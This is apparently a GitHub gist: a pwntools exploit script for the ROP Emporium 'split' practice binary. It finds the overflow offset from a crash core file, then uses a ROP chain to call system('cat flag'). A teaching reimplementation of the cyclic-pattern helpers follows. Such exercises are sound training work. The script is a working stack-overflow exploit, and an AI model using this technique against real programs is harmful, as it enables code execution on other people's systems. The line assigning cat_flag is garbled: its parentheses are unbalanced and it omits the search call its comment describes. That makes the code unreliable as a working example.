@zachriggle zachriggle/
Created Sep 25, 2017

Exploit for ROP Emporium's "split"
from pwn import *

# Set up pwntools to work with this binary
elf = context.binary = ELF('split')

# We need to invoke system("cat flag"), which requires knowing the
# location of both the function 'system' as well as the string 'cat flag'.
# (Python 3 / current pwntools: elf.search() is a generator and ROP chains are bytes.)
system = elf.symbols.system
cat_flag = next("cat flag"))

info("%#x system", system)
info("%#x cat flag", cat_flag)

# We need to ROP to call system().
# For 32-bit, we just need to set up the stack correctly.
# For 64-bit, we need to load the address of cat_flag into
# the register RDI.
# Luckily, pwntools knows all about this and handles it for us.
rop = ROP(elf)
rop.system(cat_flag)

# Again, we will automatically discover the offset with a cyclic pattern.
# Figure out how big of an overflow we need by crashing the
# process once.
io = process(elf.path)

# We will send a 'cyclic' pattern which overwrites the return
# address on the stack. The value 128 is longer than the buffer.
io.sendline(cyclic(128))

# Wait for the process to crash
io.wait()

# Open up the corefile
core = io.corefile

# Extract the faulting address, which should contain our cyclic pattern
fault = core.fault_addr
# On x86-64 a non-canonical return address raises #GP rather than a page
# fault, so fault_addr can be 0; the pattern is then still at the top of the stack.
if not fault:
    fault = core.read(core.rsp, 8)
info("%r fault", fault)

# Craft a new payload which puts the ROP stack at the correct offset
# (fit() looks the key up in the cyclic pattern and pads up to that offset)
payload = fit({
    fault: bytes(rop)
})

# Send the payload to a new copy of the process
io = process(elf.path)
io.recvuntil(b"> ")
io.sendline(payload)

# Get our flag!
flag = io.recvline()
log.success(flag.decode(errors="replace"))
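The gist leans on three pwntools helpers for the offset-discovery step: cyclic() builds the crash input, cyclic_find() maps a register value back to an offset, and fit() pads the real payload out to that offset. To show what those helpers actually do, here is a minimal reimplementation added for this page (not pwntools' code and not part of the gist). It follows the same conventions pwntools uses (lowercase alphabet, unique 4-byte windows, integer keys above 2**(word_size-8) treated as pattern values read from a register), so the offsets it reports match what the gist prints. The crash values in the usage block are constructed, not taken from a real run.

```python
# Added example: a minimal reimplementation of the cyclic-pattern offset
# discovery that the gist delegates to pwntools' cyclic()/cyclic_find()/fit().
# Not pwntools' code; it mirrors pwntools' conventions so results line up.
from functools import lru_cache
from typing import Dict, Optional, Union

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
N = 4  # every N-byte window of the pattern occurs exactly once


@lru_cache(maxsize=None)
def de_bruijn(alphabet: bytes = ALPHABET, n: int = N) -> bytes:
    """de Bruijn sequence B(k, n) via the FKM algorithm; length k**n (456976 here)."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(alphabet[i] for i in a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern (what the gist sends to crash the target)."""
    seq = de_bruijn()
    if length > len(seq):
        raise ValueError("a pattern longer than %d bytes is no longer unique" % len(seq))
    return seq[:length]


def cyclic_find(subseq: bytes) -> int:
    """Offset of the first N bytes of `subseq` within the pattern, or -1 if absent."""
    return de_bruijn().find(subseq[:N])


def offset_from_register(value: int, word_bytes: int) -> int:
    """A register or fault address read from a core file is an integer whose
    bytes are the pattern in little-endian order; unpack and look them up."""
    return cyclic_find(value.to_bytes(word_bytes, "little"))


def fit(pieces: Dict[Union[int, bytes], bytes], word_bytes: int,
        filler: Optional[bytes] = None) -> bytes:
    """Minimal analogue of pwntools' fit({offset_or_pattern_value: data}):
    bytes keys are looked up in the pattern, integer keys >= 2**(8*word_bytes-8)
    are treated as pattern values read from a register, smaller ints are offsets.
    Gaps before each piece are filled from `filler` (the pattern by default)."""
    filler = de_bruijn() if filler is None else filler
    large = 1 << (8 * word_bytes - 8)
    resolved: Dict[int, bytes] = {}
    for key, data in pieces.items():
        offset = cyclic_find(key) if isinstance(key, bytes) else key
        if isinstance(key, int) and key >= large:
            offset = offset_from_register(key, word_bytes)
        if offset < 0:
            raise ValueError("key %r not found in the pattern" % (key,))
        resolved[offset] = data
    out = bytearray()
    for offset in sorted(resolved):
        if offset < len(out):
            raise ValueError("pieces overlap at offset %d" % offset)
        out.extend(filler[len(out):offset])
        out.extend(resolved[offset])
    return bytes(out)


def windows_unique(pattern: bytes, n: int = N) -> bool:
    """Sanity check: a usable pattern has no repeated n-byte window."""
    windows = [pattern[i:i + n] for i in range(len(pattern) - n + 1)]
    return len(windows) == len(set(windows))


if __name__ == "__main__":
    pattern = cyclic(128)
    # Constructed 32-bit crash: pretend EIP ended up holding pattern[40:44].
    eip = int.from_bytes(pattern[40:44], "little")
    print("EIP %#x -> offset %d" % (eip, offset_from_register(eip, 4)))
    # Constructed 64-bit crash: the saved return address was pattern[40:48].
    rip = int.from_bytes(pattern[40:48], "little")
    print("RIP %#x -> offset %d" % (rip, offset_from_register(rip, 8)))
    print(fit({rip: b"<chain>"}, word_bytes=8))
```

Only the first N bytes of a register value are consulted, which is why a 64-bit value works with a 4-byte window: the low four bytes are unique on their own. The large-key rule in fit() is what lets the gist pass core.fault_addr straight in as a dictionary key without calling cyclic_find itself.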